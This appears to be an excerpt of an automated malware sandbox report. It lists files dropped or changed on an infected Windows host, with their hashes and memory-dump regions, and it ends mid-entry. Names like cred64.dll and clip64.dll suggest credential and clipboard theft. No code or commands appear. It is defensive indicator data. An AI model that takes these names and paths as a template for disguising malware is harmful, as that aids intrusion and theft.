SHA256 6c24799e77b963b00401713a1dbd9cba3a00249b9363e2c194d01b13b8cdb3d7
SHA512 cf0488c34a1af36b1bb854dea2decfc8394f47831b1670cab3eed8291b61188484cc8ab0a726a524ecdd20b71d291bcccbc2ce999fd91662aca63d2d22ed0d9f

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000009

MD5 a6056708f2b40fe06e76df601fdc666a
SHA1 542f2a7be8288e26f08f55216e0c32108486c04c
SHA256 fe8009d99826585803f561c9d7b01c95ec4a666e92fedb2c1ca6fa0f50bb7152
SHA512 e83e64d00199a51c1f17faca3012f6f28ad54e5ac48acea6509cccdd61ddb08b03c3a895776944190a4e261393b90f9f516ad64b1b0e4cdd88a66f6f691331a4

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00000a

MD5 b24045e033655badfcc5b3292df544fb
SHA1 7869c0742b4d5cd8f1341bb061ac6c8c8cf8544b
SHA256 ce60e71ab0f5a6f0a61ee048ff379b355d72cd01fda773380b4b474b4273ec6c
SHA512 0496eab064778fe47802d7f79a536022de4a89d085457ad0d092597f93e19653f750b86f5649768e18f631505ff9792c421ba3a14b9d30522d731b5cd3d8206c

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000024

MD5 990324ce59f0281c7b36fb9889e8887f
SHA1 35abc926cbea649385d104b1fd2963055454bf27
SHA256 67bcedd3040fc55d968bbe21df05c02b731181541aff4ae72b9205300a4a3ecc
SHA512 31e83da1ac217d25be6e7f35a041881b926f731fff69db6f144e4fe99b696a31f9ab7766ca22cf5a482743c2a2d00a699ca2c2d67837a86c471a2dd3bed9ea1f

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 285252a2f6327d41eab203dc2f402c67
SHA1 acedb7ba5fbc3ce914a8bf386a6f72ca7baa33c6
SHA256 5dfc321417fc31359f23320ea68014ebfd793c5bbed55f77dab4180bbd4a2026
SHA512 11ce7cb484fee66894e63c31db0d6b7ef66ad0327d4e7e2eb85f3bcc2e836a3a522c68d681e84542e471e54f765e091efe1ee4065641b0299b15613eb32dcc0d

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\6OA95Jz.exe

MD5 b38bf93056c1551d4c901da3bd7ac277
SHA1 a3f9128846744613b2a77cd4aebc7146e41a8a4f
SHA256 546a683f55896c6ef0980f472926c44bdcf5cb59585a478b18c77ba6e2091616
SHA512 767f892f5717a3b2a69c080edce8e5bd35e9069b677dbf1e700f557702f520acd62d81087b81d9381932a48773fb2f3932b051e9c7e6988dd0ca0f5f7a9f20c1

C:\Users\Admin\AppData\Local\Temp\14CC.exe

MD5 e561df80d8920ae9b152ddddefd13c7c
SHA1 0d020453f62d2188f7a0e55442af5d75e16e7caf
SHA256 5484ca53027230772ae149e3d7684b7e322432ceb013b6bc2440bd3c269192ea
SHA512 a7afed5a6434f296f0e0186de8ce87245bbd0f264498e327188a93551dd45e0e67409e62f3477b526ab5b0927e4349ad66107cbea7f7554b4be53c18227741a5

memory/6424-636-0x0000000074600000-0x0000000074DB0000-memory.dmp

memory/6424-640-0x00000000054D0000-0x00000000054E0000-memory.dmp

memory/5480-641-0x0000000074600000-0x0000000074DB0000-memory.dmp

memory/5480-639-0x0000000000F30000-0x0000000000F3A000-memory.dmp

memory/6196-643-0x0000000000400000-0x0000000000434000-memory.dmp

memory/6196-644-0x0000000000400000-0x0000000000434000-memory.dmp

memory/6196-649-0x0000000000400000-0x0000000000434000-memory.dmp

memory/4676-650-0x0000000000610000-0x000000000064E000-memory.dmp

memory/4676-651-0x0000000074600000-0x0000000074DB0000-memory.dmp

memory/4676-653-0x00000000074D0000-0x00000000074E0000-memory.dmp

memory/5896-758-0x0000000000400000-0x0000000000480000-memory.dmp

memory/5896-759-0x00000000005A0000-0x00000000005FA000-memory.dmp

memory/5896-766-0x0000000074600000-0x0000000074DB0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000013

MD5 9ee8d611a9369b4a54ca085c0439120c
SHA1 74ac1126b6d7927ec555c5b4dc624f57d17df7bb
SHA256 e4cf7a17182adf614419d07a906cacf03b413bc51a98aacbcfc8b8da47f8581c
SHA512 926c00967129494292e3bf9f35dbcdef8efdbddc66114d7104fcc61aa6866298ad0182c0cbdf923b694f25bb9e18020e674fd1367df236a2c6506b859641c041

memory/5896-806-0x0000000000400000-0x0000000000480000-memory.dmp

memory/5896-807-0x0000000074600000-0x0000000074DB0000-memory.dmp

memory/6424-813-0x0000000074600000-0x0000000074DB0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 57e8b42aae38a5bc6132b22e27225e61
SHA1 f51a2470f2b6aa9dfb38e3c90d4f9a14ba4f649c
SHA256 0951603f3a30b09f0940bed8324b274f5306c36e8947cde450452a833437c8c5
SHA512 c7082e09cf3a6b1db95a7a820bddf64afa24dab7c9f7342a56b1ca9c26ec874cc1260abbd5538f7a4cb8ec041280eb685e6455ffc7486466064bc5907c226813

memory/6424-846-0x00000000054D0000-0x00000000054E0000-memory.dmp

memory/5480-847-0x0000000074600000-0x0000000074DB0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

MD5 d3727f4e08d8c87e70a95fbbab4fbf46
SHA1 1dcd87bd154165712855e8055ca64ddb414dba05
SHA256 aaf3baea4f43473e71ae860dfebafce4cc9aed355bc4d9b24b065206a82c5dd7
SHA512 8d63b971bdb8428895c674d5ebd74c1bdc49eb588654eacc9e9a8def22e66a242c186d7b0199921a4df81cfd58e42e7af104f8d4cab90c133fb6ad8afba7fd98

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

MD5 28ecf9781fb6f83edaa7748be4b2798e
SHA1 4a974bc557c38f14a76573a4dfb0309efb6b3594
SHA256 da046cbd59d97b04fb7677f9ff46e8bb5dd8a6cda55eb69b997a557977608b5a
SHA512 a7ca751e5359abacdaa7cea793f056d72c259f08cc45160a6a522c818a0de42c443845aefeabf2dd2ba4ded94ae6af40e127e76d05ec97952208723e07d2e149

memory/4676-877-0x0000000074600000-0x0000000074DB0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

MD5 afd27c2fbc876c1f54034145de312a2c
SHA1 6b3d437007560a1b53ccc3881046ca1ce1c94880
SHA256 e1210f344097dcc7866f2ba2516099e9eff418e815298b693d636e6fb3bdfef2
SHA512 48a0fcb18f5f9278d4b18c79a6ed84edfc6fbb47b264e26bf3e2c63f8b21ca6f621290d6ff644965eeef8ce5cbdee133b53c86ef303fa434c39fea126a8f8b41

memory/5480-887-0x0000000074600000-0x0000000074DB0000-memory.dmp

memory/4676-888-0x00000000074D0000-0x00000000074E0000-memory.dmp

memory/7676-896-0x0000000000300000-0x0000000000CE4000-memory.dmp

memory/7676-895-0x0000000074600000-0x0000000074DB0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

MD5 6e68805f0661dbeb776db896761d469f
SHA1 95e550b2f54e9167ae02f67e963703c593833845
SHA256 095e2b0ed70525cf5a7a5c31241aad5c27964fd69d68569c646a158c0ff50b47
SHA512 5cf25502b2fc8ab34b777b490493c8974af15135e8ff81f43ff254b910f74ee5cece6848ca4a5adae54b8cbf895362f268fd1665705f39bee27f395ea5c04efc

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

MD5 89c82822be2e2bf37b5d80d575ef2ec8
SHA1 9fe2fad2faff04ad5e8d035b98676dedd5817eca
SHA256 6fea30b9d17eacffde43b727058b5b2c422a7b70407534549042ba7b20d5f8c9
SHA512 142ca76bc32cc60c11f640bd9e050df6000b6824a192595416f661d22d6e52704dfd369974d7f2f73d01eaa356237c50778737d72d5588c5a2ff8a8010ee8101

C:\Users\Admin\AppData\Local\Temp\kos4.exe

MD5 01707599b37b1216e43e84ae1f0d8c03
SHA1 521fe10ac55a1f89eba7b8e82e49407b02b0dcb2
SHA256 cc0dbc1d31ccd9488695b690bd7e7aa4a90ba4b2a5d23ef48b296465f5aa44dd
SHA512 9f9ff29a12d26a7d42656e0faf970c908f1ef428b14e5a5fe7acd06371b96b16eb984e8fbee4e2b906c6db7fb39c9d4a221e79fc3d5e9ca9b59e377875bc5642

memory/2212-929-0x0000000000770000-0x0000000000778000-memory.dmp

memory/2212-936-0x0000000002850000-0x0000000002860000-memory.dmp

memory/2212-935-0x00007FFD806C0000-0x00007FFD81181000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\latestX.exe

MD5 bae29e49e8190bfbbf0d77ffab8de59d
SHA1 4a6352bb47c7e1666a60c76f9b17ca4707872bd9
SHA256 f91e4ff7811a5848561463d970c51870c9299a80117a89fb86a698b9f727de87
SHA512 9e6cf6519e21143f9b570a878a5ca1bba376256217c34ab676e8d632611d468f277a0d6f946ab8705121002d96a89274f38458affe3df3a3a1c75e336d7d66e2

memory/7676-939-0x0000000074600000-0x0000000074DB0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\CURRENT

MD5 46295cac801e5d4857d09837238a6394
SHA1 44e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA256 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA512 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 936db77f374fc54ca39bf3fbb45d7810
SHA1 06c07c095c2446e91bd53390eadb2373eae1a0db
SHA256 f007498a12ab422352e176f6965522e5cb991224bb3099cd003af08423313ee3
SHA512 a94328056e2b168f429630a5f587fd11394d47139b5f91e3720154d5837218247d2a68cc519fd835b33a0060ba95201a7a95f99593b72e096379ff7bf4704fe8

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

MD5 c2585a1a5279680a037d25a5166ecc27
SHA1 b45007dac82ed3d6ef4f59578238d1ae109271bf
SHA256 dc26e4b3444583c20f7c8f29999adbaaf6da3a03cd44e924c0befba86fd00bc7
SHA512 ef3536acc00bcba155e776b30e1a0b9a2c3c8ef0ea1d6e0a8c4acafc050690015a4f5102fd3f378fece9ad7237cc9fc2e0b893311d5304a6ec9fac1ebfc134c4

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000010

MD5 9f1c899a371951195b4dedabf8fc4588
SHA1 7abeeee04287a2633f5d2fa32d09c4c12e76051b
SHA256 ba60b39bc10f6abd7f7a3a2a9bae5c83a0a6f7787e60115d0e8b4e17578c35f7
SHA512 86e75284beaff4727fae0a46bd8c3a8b4a7c95eceaf45845d5c3c2806139d739c983205b9163e515f6158aa7c3c901554109c92a7acc2c0077b1d22c003dba54

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000038

MD5 73ad1ae9855d313baf3b80d18908d53e
SHA1 21dd5ac5a897f298721280a34761fef3947bd58b
SHA256 24f67f034f9a5178feeaa5db9bfdc6e2a71ff9b700cb962f59820414c39382c2
SHA512 0dc9ead6cb835c004fa4570314b8de072cd55e0ce49adf5b738242709bec5799f91da525987da0af32f950f352a772ed26902b149fbecfef2463cc5407b47bd3

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00000f

MD5 eccad76805c6421735c51509323ea374
SHA1 7408929a96e1cd9a4b923b86966ce0e2b021552b
SHA256 14c8d86be351170c4e9f785c2dfb686bfe945209cbf98533f54194f8c276b6db
SHA512 4a7e5d3815d0655e0ea2aac7843d13258f312f70174d68951a21782054e684f739484dac08fda8cd47f5cf20d37516b017799d4819b0f88e46c819bd077fd94f

memory/5480-1049-0x0000000000400000-0x0000000000418000-memory.dmp

memory/2212-1051-0x00007FFD806C0000-0x00007FFD81181000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe

MD5 dee3aaee8b5da408f70a490ee6e4b8d8
SHA1 3f752a1e6e233c855507c7536bda39d7c79f211e
SHA256 7450d1598c62e104039054ee3676970f182942be66da125089383989058fbbdb
SHA512 770ab7f61acc8f9fec9536245c7ad1156b1b7ee9a6c1a4a2c1573a8c6f7cb6932f220e82b0b3428111dcbd858286f291b22e3cd433d71fbf572e60eee91d37cc

memory/536-1060-0x0000000000620000-0x0000000000621000-memory.dmp

memory/6024-1106-0x00000000022C0000-0x00000000022C9000-memory.dmp

memory/2868-1111-0x0000000074600000-0x0000000074DB0000-memory.dmp

memory/7384-1115-0x0000000000400000-0x0000000000409000-memory.dmp

memory/2880-1116-0x0000000000400000-0x0000000000612000-memory.dmp

memory/2880-1123-0x0000000000400000-0x0000000000612000-memory.dmp

memory/2868-1118-0x0000000005A80000-0x0000000005B1C000-memory.dmp

memory/8136-1163-0x0000000000400000-0x0000000000612000-memory.dmp

memory/2812-1164-0x00000000029A0000-0x0000000002DA7000-memory.dmp

memory/2812-1166-0x0000000002EB0000-0x000000000379B000-memory.dmp

memory/5480-1168-0x0000000000400000-0x0000000000418000-memory.dmp

memory/2812-1169-0x0000000000400000-0x0000000000D1B000-memory.dmp

memory/2880-1117-0x0000000000400000-0x0000000000612000-memory.dmp

memory/2868-1114-0x0000000000E40000-0x0000000001220000-memory.dmp

memory/7384-1110-0x0000000000400000-0x0000000000409000-memory.dmp

memory/6024-1104-0x00000000008D0000-0x00000000009D0000-memory.dmp

memory/5472-1218-0x0000000000470000-0x00000000004AE000-memory.dmp

memory/5472-1219-0x0000000000400000-0x0000000000461000-memory.dmp

memory/536-1248-0x0000000000620000-0x0000000000621000-memory.dmp

memory/5472-1267-0x0000000074600000-0x0000000074DB0000-memory.dmp

memory/7384-1332-0x0000000000400000-0x0000000000409000-memory.dmp

memory/3340-1329-0x0000000006E60000-0x0000000006E76000-memory.dmp

memory/2868-1338-0x0000000074600000-0x0000000074DB0000-memory.dmp

memory/5472-1344-0x0000000004990000-0x00000000049F1000-memory.dmp

memory/5472-1346-0x0000000000400000-0x0000000000461000-memory.dmp

memory/5472-1350-0x0000000074600000-0x0000000074DB0000-memory.dmp

memory/8284-1351-0x0000000000430000-0x000000000044E000-memory.dmp

memory/8284-1352-0x0000000074600000-0x0000000074DB0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 f6b9566f745943329a1102f00f7a4424
SHA1 5250f69d5545a26831e6fc2e2cfd877ccf6ee3cc
SHA256 d10fb7afc9e095952702983c635e48ee3d07f93dcc4dc1455ae5afa5d698bfd1
SHA512 ab1d05967e05c9a6dec1c738d827ba5b2b0122d6f364ffe04a8022c85520802706309b3b2fdd7d2a31dd8aaf75adc58a60ef2b1e7732fef67be2a05993b8f260

C:\Users\Admin\AppData\Roaming\006700e5a2ab05\cred64.dll

MD5 a5b509a3fb95cc3c8d89cd39fc2a30fb
SHA1 5aff4266a9c0f2af440f28aa865cebc5ddb9cd5c
SHA256 5f3c80056c7b1104c15d6fee49dac07e665c6ffd0795ad486803641ed619c529
SHA512 3cc58d989c461a04f29acbfe03ed05f970b3b3e97e6819962fc5c853f55bce7f7aba0544a712e3a45ee52ab31943c898f6b3684d755b590e3e961ae5ecd1edb9

C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll

MD5 e913b0d252d36f7c9b71268df4f634fb
SHA1 5ac70d8793712bcd8ede477071146bbb42d3f018
SHA256 4cf5b584cf79ac523f645807a65bc153fbeaa564c0e1acb4dac9004fc9d038da
SHA512 3ea08f0897c1b7b5859961351eef59840bbf319a6ad7ebe1c9e1b5e2ce25588d7b1a37fd6c5417653521fc73f1f42eb043d0ee6fcd645aa92b8f305d726273b4

memory/8920-1413-0x0000000000400000-0x000000000041B000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 d04da3ede78f99ee80f13cefdaaf6297
SHA1 b86c06fba6cb296ed25f0abcf7a36ab393e682f9
SHA256 6f31a4b00bce5dbf2e35f9dfcba976902bca2c1deaa1496880379548a6b0edcf
SHA512 c10b4dd0be30c7fd3a5a13765487bdc385f144cfaf40deb3263b004e3cec0e900651d31fa1d9c4d3a42918c799c26d43cafede8433d00476fb0354cd9e060f62

memory/8920-1423-0x0000000000400000-0x000000000041B000-memory.dmp

memory/8920-1431-0x0000000000400000-0x000000000041B000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_tsn3hwvw.ljy.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Temp\tmpA877.tmp

MD5 4bd8313fab1caf1004295d44aab77860
SHA1 0b84978fd191001c7cf461063ac63b243ffb7283
SHA256 604e2ecd34c77664dae4ceb0dab0b3e4bb6afb2778d3ed21f8d8791edd1408d9
SHA512 ca96d92a8abbd3a762e19f8e77514ee0018b7e5dc21493c37e83e22047b3cc892eced2fc80b78e6861bb972e20b93007eb46bcb7b562965be2bfa98a24c2ed65

C:\Users\Admin\AppData\Local\Temp\tmpA861.tmp

MD5 02d2c46697e3714e49f46b680b9a6b83
SHA1 84f98b56d49f01e9b6b76a4e21accf64fd319140
SHA256 522cad95d3fa6ebb3274709b8d09bbb1ca37389d0a924cd29e934a75aa04c6c9
SHA512 60348a145bfc71b1e07cb35fa79ab5ff472a3d0a557741ea2d39b3772bc395b86e261bd616f65307ae0d997294e49b5548d32f11e86ef3e2704959ca63da8aac

C:\Users\Admin\AppData\Local\Temp\tmpA94E.tmp

MD5 349e6eb110e34a08924d92f6b334801d
SHA1 bdfb289daff51890cc71697b6322aa4b35ec9169
SHA256 c9fd7be4579e4aa942e8c2b44ab10115fa6c2fe6afd0c584865413d9d53f3b2a
SHA512 2a635b815a5e117ea181ee79305ee1baf591459427acc5210d8c6c7e447be3513ead871c605eb3d32e4ab4111b2a335f26520d0ef8c1245a4af44e1faec44574

C:\Users\Admin\AppData\Local\Temp\tmpA964.tmp

MD5 ada08cda8ae6c75b68a0ab20401a5990
SHA1 93b6df02f6c9afbd3d4d78ff329858a4c51a73d4
SHA256 46dc6f60d63fef4a377deabf5a1db987c2193f15516fa1a0d9368016af81804b
SHA512 98c118db9b5ec1db84d348f9b01e1703998c36c7e8b946f04637cb1e6fbb76ab54f21e1140c3b0bded1499f4c18158654d43bbb29f9a1b3d31ebbafb1e9c1de7

C:\Users\Admin\AppData\Local\Temp\tmpA9F2.tmp

MD5 61aaf9ca97c29c76fda0895c8ea63aad
SHA1 f5b44f71f0fb0f14137a131102ea23f33da3a0d2
SHA256 c0daa39f42910ef7c837a86ffc5baa9477913b7245c334a04e9a13a8d51bf820
SHA512 6d6be876808674d99275d2f374719bdbbc87bd544e0a67ec7a73afeb2dd63f56c84ed4c54e4f29aa3c55a46aef308edb3e10d2b8ee842c4401a612dda7b981ca

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index

MD5 172bb14f297438e9ab07633e4b728680
SHA1 a8f9f9ebc3296a2bc8e70c22916ff0cec13ac0d9
SHA256 69bfd8ffc076f813cef84ce30af3717f34e925fb00afd85845b1d12dfe39f02b
SHA512 cb472425eaff7991aeaaee14e468871f935a4f2ce4eb68de8e43e3b237de1c34e4ea8588e6110068a23b5bbc9993ee292fa60cc5e3e3ab7e4d412de9bf85d09e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe58aa26.TMP

MD5 9f0c70feb89f03f9fc7587161884ce57
SHA1 21df41509ef062dcd018c636d5d6011fab11b3a8
SHA256 59422cdaa90a6ae01027eb4151c668af4014c5e52acf71cfaa87899828c878db
SHA512 08067a009bdf148a04ef10f224594e80410e3108acc0aacf5ac9ef6e4d60e6ab2bc4e6ed293f4b31725118af0f62ed4b74bf5e93e2036bd2961a142d43fa5c6c

C:\Users\Admin\AppData\Local\Temp\tmpAA3D.tmp

MD5 d367ddfda80fdcf578726bc3b0bc3e3c
SHA1 23fcd5e4e0e5e296bee7e5224a8404ecd92cf671
SHA256 0b8607fdf72f3e651a2a8b0ac7be171b4cb44909d76bb8d6c47393b8ea3d84a0
SHA512 40e9239e3f084b4b981431817ca282feb986cf49227911bf3d68845baf2ee626b564c8fabe6e13b97e6eb214da1c02ca09a62bcf5e837900160cf479c104bf77

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 299313080f9618328e843198604dab1b
SHA1 51cb5dbff1a28f7e1795160d25303eabc8c0e4eb
SHA256 b46960921ee36a54ee037652e07c115eb47985d945a4b04d95cf5458cf99518f
SHA512 f5a2b8884afbff040fd55a2e599a8247844311ce57608e11bff31697c7c1a17c6a6eaf57f7fe05f302bfaf14b815318a82abd637d713829ed4e4e6145eda6e36

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe58b040.TMP

MD5 e6d8b9b533496ab999b294957a7504a3
SHA1 93d2b5318c1b158b56c0298999a534a5c4e7f8be
SHA256 71e7263e8cd2bd3d1090b72d4e02760fc1e047f9835d532046f418cb3a4b764d
SHA512 d78a2a4413e4ceb874c0eb6a58cc2bd3c883630351539a61e0991e8b8529e6becac55e05223c8350d8b2768eec58312e5df962e8b087b18fa137777673ae8d37

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 e5dd56f81900703b1e782c5017b1b2d1
SHA1 6168d582574d002db752c3081dc0a5222852d520
SHA256 278615df4db040d3a55be8d844f92bd3d72cc419416b40f4f61a8b5549b9e515
SHA512 027bd5b0b57249c2f32d864bdfc8adf09b11bbda0f9f0f20125579e24d3831ee9e0a9a6e5fad3c65d5a9c5c8aeefcda1dc03cbfdd125485d5d35f93cd5065332

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\4c2e37f5-0ee4-4505-b8f3-13a053cda9c9\index-dir\the-real-index

MD5 5a17168f1fe9bb96d1a2b0d652e5aeb8
SHA1 6d154f0904bfdfc6dabd071ad7b7bbf844a4edc9
SHA256 5bcaed9d97e416e7ce8124109142ec909007e43f85a650cb39a1a92d8d0b8d00
SHA512 eecf0c7c9f512867d03a1a8f3103b63a222cf7ca4e51996c1603b615b05370b0e65f5f0716670eb019fe20e7e456e5fcf96654d37b5f2d5cabe5c6a3dfa0c398

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\4c2e37f5-0ee4-4505-b8f3-13a053cda9c9\index-dir\the-real-index~RFe58c52f.TMP

MD5 b885b59d0e948aee0e052a24c5bd50ae
SHA1 915dce1743251619aaea047f0659d682f0a7522d
SHA256 02be57c719d5b1cd951958d91fdc2de3980abe576f29f9c60c093be22acac0ab
SHA512 c26c50cecd98c1b7bdff4477dc670f40e6e8053b3883e7c5b9d7c59a34233ddd19077201aaaff6677e6ff62d56963cd7ffdfa5edd197eee5438c340218ea497d

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 a1f57e39c6b07a3dc21b3210cee25223
SHA1 02c689e736304589bd6c18b4a638a5db2a0087fd
SHA256 d21bafe0f4bee95d4623d05a62cdb39296552339757b395bbb75eb4872852c39
SHA512 091987fab97abb6998407d9d9802577c141ca59c19a5af2038fddca5992ae28a21eba81f25a03cf9f6300c865f33fa7935f6ffb07353a9b714a05b412c69d981

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\f5e04f79-cf93-493e-8d07-88ce12d92afb\index-dir\the-real-index

MD5 5b89cae6a574385e3f25fce6919c5eb0
SHA1 297fd7775dc1dfdd16425493ec34bb4c9b86f40e
SHA256 a11b06e3c629ca80f6c5741d947f98c2557399e2cb11d25e13186f3943cb96a8
SHA512 af252f5ab34ef472a2018a10141929397454cc7252ad74ef62779b1195edc2f3103ea4325dcdc0438d0238d573d6c346451d4aa71bc8be98201ecdfcca337bde

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\f5e04f79-cf93-493e-8d07-88ce12d92afb\index-dir\the-real-index~RFe58c937.TMP

MD5 4755ffca6cb42e8757a9aa858a52df80
SHA1 a500f174824708cdc8468680496b640754bd05e2
SHA256 9cdd44ce1680c68973d5707884a46a9417e2a6786d791ba4982282310173b787
SHA512 dda88d713a8e1e4f4bb7dca46677cc3ec01ed94c1c211ea2411cee3a1c0e12d86d362c3f5f4d98061b77372489dbeec56cabde52ef7b5855e05d404bde75c3c1

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

MD5 ad51043bc99174ec5bac0189da89e87d
SHA1 2550e162d627ea65ea3d44f2be059adb753765ac
SHA256 1a5630f9fdf41b3202ee803864628303aec45d0cb6ac15787a4fc422f1da253f
SHA512 6edf735c974c9ba254251707c7c1a21d62e951828c8a0c12eb0e327986addc78e56c8555db9555e7ec82948ec2ee8e07de857901dcc24a59e2e7a0e2090b3900

memory/5440-1848-0x00007FF60DC50000-0x00007FF60E1F1000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 e659280a9cf254ec0680f5e0f547e386
SHA1 9581ac62be1b5bd5fa43851c697d0d0e634841dc
SHA256 d83b0c30d8fd0dc6e55daef3fa77e197738b2db89ae4d6efb724552181da2bf6
SHA512 ae2b0f1c37b4c5d89ea7537ba8622bb8294b5628b2232cd4a8687c4713939f8bd8113d79985f43872a0996109467881378e8fb82c66fbad9b45a47edec296442

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 e04252585244c10ba58fe9f4c05f71ae
SHA1 a10f0166c2875cc0da65a624a742f77a82b26c30
SHA256 3b909105a238b32ba08dbc025aab8b606912138245b91f973de3d38b86443464
SHA512 e598253777e4bfa3799d64baf021722d7961b7aa9a5c579280546146f40394e3348b1f5bb716705005308bc43e3ea54423e8e50f88983951b24d8e778a2892f6

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00000e

MD5 8eb5c41bcc41b26d2df786cf842497cd
SHA1 ed2167c2eb6906c0794f90a304ac870687c486b8
SHA256 52775f71c06824d4081692f9f4e47e02aa5a41694daef3b8f57e14a49933a77d
SHA512 77eae3cdd04da631414f861a08bc5e0279cdf745b6922fcd0ffe022c44585e0316a1e78d2cc86d1c21d6ab01e104cd959168a55e40e08a33d896a679c00b3771

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 ae27ccdbb7fe5908eb6395fa32cab8b8
SHA1 1754ecf6ea3bb9080ed2cb49ebe50ebdd5c252f1
SHA256 25b90111d539d897c5df621ab2608b51838bf917a46f1106df9c5d62bf7ac873
SHA512 acfc38d95764b35aac83d5e9caf629c3ed36c5de0b79fb0b93ec7c66c6ac623023f9be32ec39956df978c884ea4345fb5273609125f39ac173a5f66d10d7a6ff

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000017

MD5 d5b8d141a08fdde8abf6cd1d5343346a
SHA1 bdac6246a7ef746566b18033eef52ee4de95082f
SHA256 0ed2ba45aaff926c33f6a21b1edea31ae58932999d4e7594907c0f067baf8ec3
SHA512 fb3f2d0e09158e5758d33408bf366b1aee9973f6a549b434b67c4b5946afb59e702f3ad85dcec92308503db8c0e1b54ea6e2e22a7c24347289b8b98346c02fca

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 751b6c1870d714776a478e4bd0a4481a
SHA1 e1d8132faa94d365548f10c2284a2760eba5d183
SHA256 0b2654ee016ae549f55efd9d2eafc30e3302c516e3e9d97c81daf9a437e7b4f0
SHA512 a0571338f20280075b4b88ff7b3c562346c9ea0e9e10319ae0806bd544faa03ad8007c43765c77d36d6d2593842f2071b39e6be9f3ad05db998812ca293acfa3

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 e3f612aed354730bb423ea29139b2151
SHA1 e082c1e5a6e353aae9bbf2dda51a58b06bb716a8
SHA256 6b63ab817aea904c8ba1ed346ea61facc5d08f577f6a7a18e130261000c00418
SHA512 3a897d888af2fb5abaf62a20a39466b2bfb7d5f0faf5430d5684c3bb308776aefd574eea13b35b7d1fbfef18249665d3f5c51d0b4082670039fc8e255f9bb10a

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 c4f9e89e04436249dca6ce2b10bef9a5
SHA1 11055ae4ded494c5937deb4015feebd2a671b5e1
SHA256 f83e1629a0585352a3d1308b1ee44fb698c7c5ab448ed18e13800412a48c3112
